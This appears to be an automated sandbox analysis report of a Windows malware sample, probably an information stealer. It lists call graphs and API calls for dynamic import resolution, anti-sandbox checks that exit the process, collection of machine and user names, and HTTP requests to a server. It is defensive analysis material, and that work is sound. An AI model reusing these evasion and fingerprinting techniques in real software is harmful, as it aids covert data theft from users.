26874->26878 26875 91fce9 lstrcpy 26875->26878 26876 91ee90 28 API calls 26876->26878 26877 91fa19 lstrcpy 26877->26878 26878->26818 26878->26820 26878->26822 26878->26823 26878->26825 26878->26830 26878->26831 26878->26856 26878->26860 26878->26869 26878->26870 26878->26872 26878->26873 26878->26874 26878->26875 26878->26876 26878->26877 26879 91fd3a lstrcpy 26878->26879 26879->26878 26880->25904 26882 922785 26881->26882 26883 92278c GetVolumeInformationA 26881->26883 26882->26883 26884 9227ec GetProcessHeap RtlAllocateHeap 26883->26884 26886 922822 26884->26886 26887 922826 wsprintfA 26884->26887 27104 9271e0 26886->27104 26887->26886 26891 904c70 26890->26891 26892 904c85 26891->26892 26893 904c7d lstrcpy 26891->26893 27108 904bc0 26892->27108 26893->26892 26895 904c90 26896 904ccc lstrcpy 26895->26896 26897 904cd8 26895->26897 26896->26897 26898 904cff lstrcpy 26897->26898 26899 904d0b 26897->26899 26898->26899 26900 904d2f lstrcpy 26899->26900 26901 904d3b 26899->26901 26900->26901 26902 904d6d lstrcpy 26901->26902 26903 904d79 26901->26903 26902->26903 26904 904da0 lstrcpy 26903->26904 26905 904dac InternetOpenA StrCmpCA 26903->26905 26904->26905 26906 904de0 26905->26906 26907 9054b8 InternetCloseHandle CryptStringToBinaryA 26906->26907 27112 923e70 26906->27112 26908 9054e8 LocalAlloc 26907->26908 26925 9055d8 26907->26925 26910 9054ff CryptStringToBinaryA 26908->26910 26908->26925 26911 905517 LocalFree 26910->26911 26912 905529 lstrlen 26910->26912 26911->26925 26913 90553d 26912->26913 26915 905563 lstrlen 26913->26915 26916 905557 lstrcpy 26913->26916 26914 904dfa 26917 904e23 lstrcpy lstrcat 26914->26917 26918 904e38 26914->26918 26920 90557d 26915->26920 26916->26915 26917->26918 26919 904e5a lstrcpy 26918->26919 26922 904e62 26918->26922 26919->26922 26921 90558f lstrcpy lstrcat 26920->26921 26923 9055a2 26920->26923 26921->26923 26924 904e71 lstrlen 26922->26924 26926 9055d1 26923->26926 26928 9055c9 lstrcpy 26923->26928 26927 904e89 26924->26927 
26925->25933 26926->26925 26929 904e95 lstrcpy lstrcat 26927->26929 26930 904eac 26927->26930 26928->26926 26929->26930 26931 904ed5 26930->26931 26932 904ecd lstrcpy 26930->26932 26933 904edc lstrlen 26931->26933 26932->26931 26934 904ef2 26933->26934 26935 904efe lstrcpy lstrcat 26934->26935 26936 904f15 26934->26936 26935->26936 26937 904f36 lstrcpy 26936->26937 26938 904f3e 26936->26938 26937->26938 26939 904f65 lstrcpy lstrcat 26938->26939 26940 904f7b 26938->26940 26939->26940 26941 904fa4 26940->26941 26942 904f9c lstrcpy 26940->26942 26943 904fab lstrlen 26941->26943 26942->26941 26944 904fc1 26943->26944 26945 904fcd lstrcpy lstrcat 26944->26945 26946 904fe4 26944->26946 26945->26946 26947 90500d 26946->26947 26948 905005 lstrcpy 26946->26948 26949 905014 lstrlen 26947->26949 26948->26947 26950 90502a 26949->26950 26951 905036 lstrcpy lstrcat 26950->26951 26952 90504d 26950->26952 26951->26952 26953 905079 26952->26953 26954 905071 lstrcpy 26952->26954 26955 905080 lstrlen 26953->26955 26954->26953 26956 90509b 26955->26956 26957 9050ac lstrcpy lstrcat 26956->26957 26958 9050bc 26956->26958 26957->26958 26959 9050da lstrcpy lstrcat 26958->26959 26960 9050ed 26958->26960 26959->26960 26961 90510b lstrcpy 26960->26961 26962 905113 26960->26962 26961->26962 26963 905121 InternetConnectA 26962->26963 26963->26907 26964 905150 HttpOpenRequestA 26963->26964 26965 9054b1 InternetCloseHandle 26964->26965 26966 90518b 26964->26966 26965->26907 27119 927310 lstrlen 26966->27119 26970 9051a4 27127 9272c0 26970->27127 26973 927280 lstrcpy 26974 9051c0 26973->26974 26975 927310 3 API calls 26974->26975 26976 9051d5 26975->26976 26977 927280 lstrcpy 26976->26977 26978 9051de 26977->26978 26979 927310 3 API calls 26978->26979 26980 9051f4 26979->26980 26981 927280 lstrcpy 26980->26981 26982 9051fd 26981->26982 26983 927310 3 API calls 26982->26983 26984 905213 26983->26984 26985 927280 lstrcpy 26984->26985 26986 90521c 26985->26986 26987 927310 3 API calls 26986->26987 
26988 905231 26987->26988 26989 927280 lstrcpy 26988->26989 26990 90523a 26989->26990 26991 9272c0 2 API calls 26990->26991 26992 90524d 26991->26992 26993 927280 lstrcpy 26992->26993 26994 905256 26993->26994 26995 927310 3 API calls 26994->26995 26996 90526b 26995->26996 26997 927280 lstrcpy 26996->26997 26998 905274 26997->26998 26999 927310 3 API calls 26998->26999 27000 905289 26999->27000 27001 927280 lstrcpy 27000->27001 27002 905292 27001->27002 27003 9272c0 2 API calls 27002->27003 27004 9052a5 27003->27004 27005 927280 lstrcpy 27004->27005 27006 9052ae 27005->27006 27007 927310 3 API calls 27006->27007 27008 9052c3 27007->27008 27009 927280 lstrcpy 27008->27009 27010 9052cc 27009->27010 27011 927310 3 API calls 27010->27011 27012 9052e2 27011->27012 27013 927280 lstrcpy 27012->27013 27014 9052eb 27013->27014 27015 927310 3 API calls 27014->27015 27016 905301 27015->27016 27017 927280 lstrcpy 27016->27017 27018 90530a 27017->27018 27019 927310 3 API calls 27018->27019 27020 90531f 27019->27020 27021 927280 lstrcpy 27020->27021 27022 905328 27021->27022 27023 9272c0 2 API calls 27022->27023 27024 90533b 27023->27024 27025 927280 lstrcpy 27024->27025 27026 905344 27025->27026 27027 905370 lstrcpy 27026->27027 27028 90537c 27026->27028 27027->27028 27029 9272c0 2 API calls 27028->27029 27030 90538a 27029->27030 27031 9272c0 2 API calls 27030->27031 27032 905397 27031->27032 27033 927280 lstrcpy 27032->27033 27034 9053a1 27033->27034 27035 9053b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27034->27035 27036 90549c InternetCloseHandle 27035->27036 27040 9053f2 27035->27040 27038 9054ae 27036->27038 27037 9053fd lstrlen 27037->27040 27038->26965 27039 90542e lstrcpy lstrcat 27039->27040 27040->27036 27040->27037 27040->27039 27041 905473 27040->27041 27042 90546b lstrcpy 27040->27042 27043 90547a InternetReadFile 27041->27043 27042->27041 27043->27036 27043->27040 27045 918cc6 ExitProcess 27044->27045 27046 918ccd 27044->27046 27047 918ee2 27046->27047 
27048 918d30 lstrlen 27046->27048 27049 918e56 StrCmpCA 27046->27049 27050 918d5a lstrlen 27046->27050 27051 918dbd StrCmpCA 27046->27051 27052 918ddd StrCmpCA 27046->27052 27053 918dfd StrCmpCA 27046->27053 27054 918e1d StrCmpCA 27046->27054 27055 918e3d StrCmpCA 27046->27055 27056 918d84 StrCmpCA 27046->27056 27057 918da4 StrCmpCA 27046->27057 27058 918d06 lstrlen 27046->27058 27059 918e88 lstrlen 27046->27059 27060 918e6f StrCmpCA 27046->27060 27061 918ebb lstrcpy 27046->27061 27047->25935 27048->27046 27049->27046 27050->27046 27051->27046 27052->27046 27053->27046 27054->27046 27055->27046 27056->27046 27057->27046 27058->27046 27059->27046 27060->27046 27061->27046 27062->25941 27063->25943 27064->25949 27065->25951 27066->25957 27067->25959 27068->25965 27069->25969 27070->25975 27071->25977 27072->25981 27073->25995 27074->25999 27075->25998 27076->25994 27077->25998 27078->26017 27079->26001 27080->26002 27081->26006 27082->26012 27083->26014 27084->26020 27085->26023 27086->26030 27087->26052 27088->26056 27089->26055 27090->26051 27091->26055 27092->26065 27095 90161f 27094->27095 27096 90162b lstrcpy 27095->27096 27097 901633 27095->27097 27096->27097 27098 90164d lstrcpy 27097->27098 27100 901655 27097->27100 27098->27100 27099 901677 27102 901699 27099->27102 27103 901691 lstrcpy 27099->27103 27100->27099 27101 90166f lstrcpy 27100->27101 27101->27099 27102->26787 27103->27102 27105 9271e6 27104->27105 27106 922860 27105->27106 27107 9271fc lstrcpy 27105->27107 27106->25930 27107->27106 27109 904bd0 27108->27109 27109->27109 27110 904bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27109->27110 27111 904c41 27110->27111 27111->26895 27113 923e83 27112->27113 27114 923e9f lstrcpy 27113->27114 27115 923eab 27113->27115 27114->27115 27116 923ed5 GetSystemTime 27115->27116 27117 923ecd lstrcpy 27115->27117 27118 923ef3 27116->27118 27117->27116 27118->26914 27120 92732d 27119->27120 27121 90519b 27120->27121 27122 92733d lstrcpy lstrcat 
27120->27122 27123 927280 27121->27123 27122->27121 27124 92728c 27123->27124 27125 9272b4 27124->27125 27126 9272ac lstrcpy 27124->27126 27125->26970 27126->27125 27129 9272dc 27127->27129 27128 9051b7 27128->26973 27129->27128 27130 9272ed lstrcpy lstrcat 27129->27130 27130->27128 27155 9231f0 GetSystemInfo wsprintfA 27149 914c77 295 API calls 27141 91e0f9 140 API calls 27186 916b79 138 API calls 27151 908c79 malloc strcpy_s 27164 91f2f8 93 API calls 27177 90bbf9 90 API calls 27187 901b64 162 API calls 27161 922d60 11 API calls 27188 922b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27189 92a280 __CxxFrameHandler 27168 911269 408 API calls 27152 905869 57 API calls
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00904C7F
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00904CD2
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00904D05
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00904D35
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00904D73
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00904DA6
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00904DB6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: 605539e6e2622fcd7d08524346cdff84a7fc80c77dec7d2cd94e7d6b066948d8
                        • Instruction ID: 2779dc19fec39a703d3acc27789eec086ab81907cb0b020c067be1986f00e113
                        • Opcode Fuzzy Hash: 605539e6e2622fcd7d08524346cdff84a7fc80c77dec7d2cd94e7d6b066948d8
                        • Instruction Fuzzy Hash: 5D528D71A006169FDB21EFA4DD89BAEB7B9AF84300F154424F905F7291DF74EC468BA0

                        Control-flow Graph

                        Basic blocks (node id, address range, API calls):
                        • 2125 926390-9263bd GetPEB
                        • 2127 9263c3-9265be call 9262f0, GetProcAddress * 20
                        • 2126 9265c3-926623 LoadLibraryA * 5
                        • 2128 926625-926633 GetProcAddress
                        • 2129 926638-92663f
                        • 2132 926641-926667 GetProcAddress * 2
                        • 2133 92666c-926673
                        • 2134 926675-926683 GetProcAddress
                        • 2135 926688-92668f
                        • 2137 926691-92669f GetProcAddress
                        • 2138 9266a4-9266ab
                        • 2140 9266ad-9266d2 GetProcAddress * 2
                        • 2139 9266d7-9266da
                        Edges: 2125->2126, 2125->2127, 2126->2128, 2126->2129, 2127->2126, 2128->2129, 2129->2132, 2129->2133, 2132->2133, 2133->2134, 2133->2135, 2134->2135, 2135->2137, 2135->2138, 2137->2138, 2138->2139, 2138->2140, 2140->2139
                        APIs
                        • GetProcAddress.KERNEL32(77190000,015E1528), ref: 009263E9
                        • GetProcAddress.KERNEL32(77190000,015E1540), ref: 00926402
                        • GetProcAddress.KERNEL32(77190000,015E16A8), ref: 0092641A
                        • GetProcAddress.KERNEL32(77190000,015E16D8), ref: 00926432
                        • GetProcAddress.KERNEL32(77190000,015E8C08), ref: 0092644B
                        • GetProcAddress.KERNEL32(77190000,015D52E8), ref: 00926463
                        • GetProcAddress.KERNEL32(77190000,015D5168), ref: 0092647B
                        • GetProcAddress.KERNEL32(77190000,015E1738), ref: 00926494
                        • GetProcAddress.KERNEL32(77190000,015E1750), ref: 009264AC
                        • GetProcAddress.KERNEL32(77190000,015E15D0), ref: 009264C4
                        • GetProcAddress.KERNEL32(77190000,015E1510), ref: 009264DD
                        • GetProcAddress.KERNEL32(77190000,015D50C8), ref: 009264F5
                        • GetProcAddress.KERNEL32(77190000,015E1558), ref: 0092650D
                        • GetProcAddress.KERNEL32(77190000,015E1570), ref: 00926526
                        • GetProcAddress.KERNEL32(77190000,015D5348), ref: 0092653E
                        • GetProcAddress.KERNEL32(77190000,015E1588), ref: 00926556
                        • GetProcAddress.KERNEL32(77190000,015E15A0), ref: 0092656F
                        • GetProcAddress.KERNEL32(77190000,015D50E8), ref: 00926587
                        • GetProcAddress.KERNEL32(77190000,015E18B8), ref: 0092659F
                        • GetProcAddress.KERNEL32(77190000,015D5308), ref: 009265B8
                        • LoadLibraryA.KERNEL32(015E17F8,?,?,?,00921C03), ref: 009265C9
                        • LoadLibraryA.KERNEL32(015E1870,?,?,?,00921C03), ref: 009265DB
                        • LoadLibraryA.KERNEL32(015E1810,?,?,?,00921C03), ref: 009265ED
                        • LoadLibraryA.KERNEL32(015E1828,?,?,?,00921C03), ref: 009265FE
                        • LoadLibraryA.KERNEL32(015E1840,?,?,?,00921C03), ref: 00926610
                        • GetProcAddress.KERNEL32(76850000,015E1888), ref: 0092662D
                        • GetProcAddress.KERNEL32(77040000,015E18A0), ref: 00926649
                        • GetProcAddress.KERNEL32(77040000,015E1858), ref: 00926661
                        • GetProcAddress.KERNEL32(75A10000,015E8D80), ref: 0092667D
                        • GetProcAddress.KERNEL32(75690000,015D4F88), ref: 00926699
                        • GetProcAddress.KERNEL32(776F0000,015E8C58), ref: 009266B5
                        • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 009266CC
                        Strings
                        • NtQueryInformationProcess, xrefs: 009266C1
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 28f5eda6e806fa8a69bcd68e49856e866fe57e7215afef47364cbd7b024234e4
                        • Instruction ID: 717b265d0129ef49901dfed58a366cfcf8f9660edb90cdf2e0a9b40880726bf2
                        • Opcode Fuzzy Hash: 28f5eda6e806fa8a69bcd68e49856e866fe57e7215afef47364cbd7b024234e4
                        • Instruction Fuzzy Hash: A6A162B9A117009FD758DF69EE88A2E37B9F7887403208919F956C3364DFB4A900DF61

                        Control-flow Graph

                        Basic blocks (node id, address range, API calls):
                        • 2141 921bf0-921c0b call 902a90, call 926390
                        • 2147 921c0d
                        • 2148 921c10-921c18
                        • 2146 921c1a-921c27 call 902930
                        • 2152 921c29-921c2f lstrcpy
                        • 2151 921c35-921c63
                        • 2156 921c65-921c67 ExitProcess
                        • 2157 921c6d-921c7b GetSystemInfo
                        • 2159 921c7d-921c7f ExitProcess
                        • 2158 921c85-921ca0 call 901030, call 9010c0, GetUserDefaultLangID
                        • 2164 921ca2-921ca9
                        • 2166 921cb0-921cb2 ExitProcess
                        • 2165 921cb8-921cca call 922ad0, call 923e10
                        • 2172 921ccc-921cde call 922a40, call 923e10
                        • 2185 921ce0-921ce1 ExitProcess
                        • 2171 921ce7-921d06 lstrlen, call 902930
                        • 2178 921d08-921d0d
                        • 2180 921d0f-921d11
                        • 2183 921d13-921d1d lstrcpy lstrcat
                        • 2177 921d23-921d40 lstrlen, call 902930
                        • 2186 921d42-921d44
                        • 2188 921d46-921d54 lstrcpy lstrcat
                        • 2187 921d5a-921d7b call 922ad0, lstrlen, call 902930
                        • 2194 921d7d-921d7f
                        • 2196 921d81-921d85
                        • 2197 921d87-921d94 lstrcpy lstrcat
                        • 2193 921d9a-921db4 lstrlen, call 902930
                        • 2199 921db6-921db8
                        • 2201 921dba-921dc8 lstrcpy lstrcat
                        • 2200 921dce-921deb call 922a40, lstrlen, call 902930
                        • 2207 921ded-921def
                        • 2208 921df1-921df5
                        • 2213 921df7-921e04 lstrcpy lstrcat
                        • 2206 921e0a-921e0f
                        • 2209 921e11 call 902a20
                        • 2210 921e16-921e22 call 902930
                        • 2216 921e24-921e26
                        • 2217 921e28-921e2a lstrcpy
                        • 2215 921e30-921e66 call 902a20 * 5, OpenEventA
                        • 2228 921e68-921e8a CloseHandle Sleep OpenEventA
                        • 2229 921e8c-921ea0 CreateEventA, call 921b20, call 91ffd0
                        • 2233 921ea5-921eae CloseHandle ExitProcess
                        Edges: 2141->2146, 2141->2147, 2146->2151, 2146->2152, 2147->2148, 2148->2146, 2148->2148, 2151->2156, 2151->2157, 2152->2151, 2157->2158, 2157->2159, 2158->2164, 2158->2165, 2164->2165, 2164->2166, 2165->2171, 2165->2172, 2171->2177, 2171->2178, 2172->2171, 2172->2185, 2177->2186, 2177->2187, 2178->2177, 2178->2180, 2180->2177, 2180->2183, 2183->2177, 2186->2187, 2186->2188, 2187->2193, 2187->2194, 2188->2187, 2193->2199, 2193->2200, 2194->2193, 2194->2196, 2196->2193, 2196->2197, 2197->2193, 2199->2200, 2199->2201, 2200->2206, 2200->2207, 2201->2200, 2206->2209, 2206->2210, 2207->2206, 2207->2208, 2208->2206, 2208->2213, 2209->2210, 2210->2215, 2210->2216, 2213->2206, 2215->2228, 2215->2229, 2216->2215, 2216->2217, 2217->2215, 2228->2228, 2228->2229, 2229->2233
                        APIs
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1528), ref: 009263E9
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1540), ref: 00926402
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E16A8), ref: 0092641A
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E16D8), ref: 00926432
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E8C08), ref: 0092644B
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015D52E8), ref: 00926463
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015D5168), ref: 0092647B
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1738), ref: 00926494
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1750), ref: 009264AC
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E15D0), ref: 009264C4
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1510), ref: 009264DD
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015D50C8), ref: 009264F5
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1558), ref: 0092650D
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00921C2F
                        • ExitProcess.KERNEL32 ref: 00921C67
                        • GetSystemInfo.KERNEL32(?), ref: 00921C71
                        • ExitProcess.KERNEL32 ref: 00921C7F
                          • Part of subcall function 00901030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00901046
                          • Part of subcall function 00901030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0090104D
                          • Part of subcall function 00901030: ExitProcess.KERNEL32 ref: 00901058
                          • Part of subcall function 009010C0: GlobalMemoryStatusEx.KERNEL32 ref: 009010EA
                          • Part of subcall function 009010C0: ExitProcess.KERNEL32 ref: 00901114
                        • GetUserDefaultLangID.KERNEL32 ref: 00921C8F
                        • ExitProcess.KERNEL32 ref: 00921CB2
                        • ExitProcess.KERNEL32 ref: 00921CE1
                        • lstrlen.KERNEL32(015E8B28), ref: 00921CEE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00921D15
                        • lstrcat.KERNEL32(00000000,015E8B28), ref: 00921D1D
                        • lstrlen.KERNEL32(00934B98), ref: 00921D28
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921D48
                        • lstrcat.KERNEL32(00000000,00934B98), ref: 00921D54
                        • lstrlen.KERNEL32(00000000), ref: 00921D63
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921D89
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921D94
                        • lstrlen.KERNEL32(00934B98), ref: 00921D9F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921DBC
                        • lstrcat.KERNEL32(00000000,00934B98), ref: 00921DC8
                        • lstrlen.KERNEL32(00000000), ref: 00921DD7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921DF9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921E04
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                        • String ID:
                        • API String ID: 3366406952-0
                        • Opcode ID: 92796f0152a0f48a623fa76a7adec90af6e3b96e4bf5e23a2cdea0cfb092b23c
                        • Instruction ID: 2dcf6f3f1909d793105e009466fad2028238c1be5e79d5357aac4b82483620ce
                        • Opcode Fuzzy Hash: 92796f0152a0f48a623fa76a7adec90af6e3b96e4bf5e23a2cdea0cfb092b23c
                        • Instruction Fuzzy Hash: 3171B031600326AFDB21ABB4ED8DB6E3ABDAF94701F244024F906A71E5DF74D801CB61

                        Control-flow Graph

                        Basic blocks (node id, address range, API calls):
                        • 2850 904a60-904afc RtlAllocateHeap
                        • 2868 904afe-904b03
                        • 2869 904b06-904b78
                        • 2867 904b7a-904bbe VirtualProtect
                        Edges: 2850->2867, 2850->2868, 2868->2869, 2869->2867
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00904AA2
                        • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00904BB0
                        Strings
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-3329630956
                        • Opcode ID: 69fdec112976d79293b57cf39b81e22d8c206b883db6780f6e1b85ab94161026
                        • Instruction ID: 10495f5fbddaa6a474990116423e4a5c01eb0024a7de6aa96f8fb72fc32c17e8
                        • Opcode Fuzzy Hash: 69fdec112976d79293b57cf39b81e22d8c206b883db6780f6e1b85ab94161026
                        • Instruction Fuzzy Hash: 3B31CE29B8422D768620EBEF4C4BB5F6E55DFC5FA8F2340A6B50857180C9A16580CFE2

                        Control-flow Graph

                        Basic blocks (node id, address range, API calls):
                        • 2957 922ad0-922b22 GetProcessHeap RtlAllocateHeap GetComputerNameA
                        • 2959 922b24-922b36
                        • 2958 922b44-922b59
                        Edges: 2957->2958, 2957->2959
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00922AFF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00922B06
                        • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00922B1A
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 475a8b3253687fee323e9e72e220d02881e81bb8e1d7bc64e5304d20fa3d6a4c
                        • Instruction ID: 50e1e778591ba292224aa1cce5278adcf909e673af679a6ce2f5a40ee29d8d95
                        • Opcode Fuzzy Hash: 475a8b3253687fee323e9e72e220d02881e81bb8e1d7bc64e5304d20fa3d6a4c
                        • Instruction Fuzzy Hash: 9901D172A44218ABC710CF99ED45BAEF7BCFB45B21F10026AF919E3780D7B41904CBA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00922A6F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00922A76
                        • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00922A8A
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0

                        Control-flow Graph (graph image not reproduced; entry block 9266e0, import-resolution blocks calling LoadLibraryA and GetProcAddress, executed/not-executed marking omitted)
                        APIs
                        • GetProcAddress.KERNEL32(77190000,015D5068), ref: 009266F5
                        • GetProcAddress.KERNEL32(77190000,015D5088), ref: 0092670D
                        • GetProcAddress.KERNEL32(77190000,015E8FC0), ref: 00926726
                        • GetProcAddress.KERNEL32(77190000,015E8FD8), ref: 0092673E
                        • GetProcAddress.KERNEL32(77190000,015E9008), ref: 00926756
                        • GetProcAddress.KERNEL32(77190000,015EE5F0), ref: 0092676F
                        • GetProcAddress.KERNEL32(77190000,015DA7F8), ref: 00926787
                        • GetProcAddress.KERNEL32(77190000,015EE770), ref: 0092679F
                        • GetProcAddress.KERNEL32(77190000,015EE548), ref: 009267B8
                        • GetProcAddress.KERNEL32(77190000,015EE488), ref: 009267D0
                        • GetProcAddress.KERNEL32(77190000,015EE740), ref: 009267E8
                        • GetProcAddress.KERNEL32(77190000,015D50A8), ref: 00926801
                        • GetProcAddress.KERNEL32(77190000,015D51E8), ref: 00926819
                        • GetProcAddress.KERNEL32(77190000,015D5148), ref: 00926831
                        • GetProcAddress.KERNEL32(77190000,015D5108), ref: 0092684A
                        • GetProcAddress.KERNEL32(77190000,015EE728), ref: 00926862
                        • GetProcAddress.KERNEL32(77190000,015EE668), ref: 0092687A
                        • GetProcAddress.KERNEL32(77190000,015DA528), ref: 00926893
                        • GetProcAddress.KERNEL32(77190000,015D5128), ref: 009268AB
                        • GetProcAddress.KERNEL32(77190000,015EE4A0), ref: 009268C3
                        • GetProcAddress.KERNEL32(77190000,015EE6C8), ref: 009268DC
                        • GetProcAddress.KERNEL32(77190000,015EE710), ref: 009268F4
                        • GetProcAddress.KERNEL32(77190000,015EE608), ref: 0092690C
                        • GetProcAddress.KERNEL32(77190000,015D51A8), ref: 00926925
                        • GetProcAddress.KERNEL32(77190000,015EE5C0), ref: 0092693D
                        • GetProcAddress.KERNEL32(77190000,015EE560), ref: 00926955
                        • GetProcAddress.KERNEL32(77190000,015EE758), ref: 0092696E
                        • GetProcAddress.KERNEL32(77190000,015EE578), ref: 00926986
                        • GetProcAddress.KERNEL32(77190000,015EE4B8), ref: 0092699E
                        • GetProcAddress.KERNEL32(77190000,015EE4D0), ref: 009269B7
                        • GetProcAddress.KERNEL32(77190000,015EE4E8), ref: 009269CF
                        • GetProcAddress.KERNEL32(77190000,015EE5A8), ref: 009269E7
                        • GetProcAddress.KERNEL32(77190000,015EE500), ref: 00926A00
                        • GetProcAddress.KERNEL32(77190000,015DFDA8), ref: 00926A18
                        • GetProcAddress.KERNEL32(77190000,015EE518), ref: 00926A30
                        • GetProcAddress.KERNEL32(77190000,015EE530), ref: 00926A49
                        • GetProcAddress.KERNEL32(77190000,015D51C8), ref: 00926A61
                        • GetProcAddress.KERNEL32(77190000,015EE620), ref: 00926A79
                        • GetProcAddress.KERNEL32(77190000,015D5328), ref: 00926A92
                        • GetProcAddress.KERNEL32(77190000,015EE590), ref: 00926AAA
                        • GetProcAddress.KERNEL32(77190000,015EE698), ref: 00926AC2
                        • GetProcAddress.KERNEL32(77190000,015D5208), ref: 00926ADB
                        • GetProcAddress.KERNEL32(77190000,015D5268), ref: 00926AF3
                        • LoadLibraryA.KERNEL32(015EE5D8,0092051F), ref: 00926B05
                        • LoadLibraryA.KERNEL32(015EE638), ref: 00926B16
                        • LoadLibraryA.KERNEL32(015EE650), ref: 00926B28
                        • LoadLibraryA.KERNEL32(015EE680), ref: 00926B3A
                        • LoadLibraryA.KERNEL32(015EE6B0), ref: 00926B4B
                        • LoadLibraryA.KERNEL32(015EE6E0), ref: 00926B5D
                        • LoadLibraryA.KERNEL32(015EE6F8), ref: 00926B6F
                        • LoadLibraryA.KERNEL32(015EE8A8), ref: 00926B80
                        • GetProcAddress.KERNEL32(77040000,015D52A8), ref: 00926B9C
                        • GetProcAddress.KERNEL32(77040000,015EE7A0), ref: 00926BB4
                        • GetProcAddress.KERNEL32(77040000,015E8BA8), ref: 00926BCD
                        • GetProcAddress.KERNEL32(77040000,015EE7B8), ref: 00926BE5
                        • GetProcAddress.KERNEL32(77040000,015D5288), ref: 00926BFD
                        • GetProcAddress.KERNEL32(70460000,015DA690), ref: 00926C1D
                        • GetProcAddress.KERNEL32(70460000,015D56C8), ref: 00926C35
                        • GetProcAddress.KERNEL32(70460000,015DA550), ref: 00926C4E
                        • GetProcAddress.KERNEL32(70460000,015EE8C0), ref: 00926C66
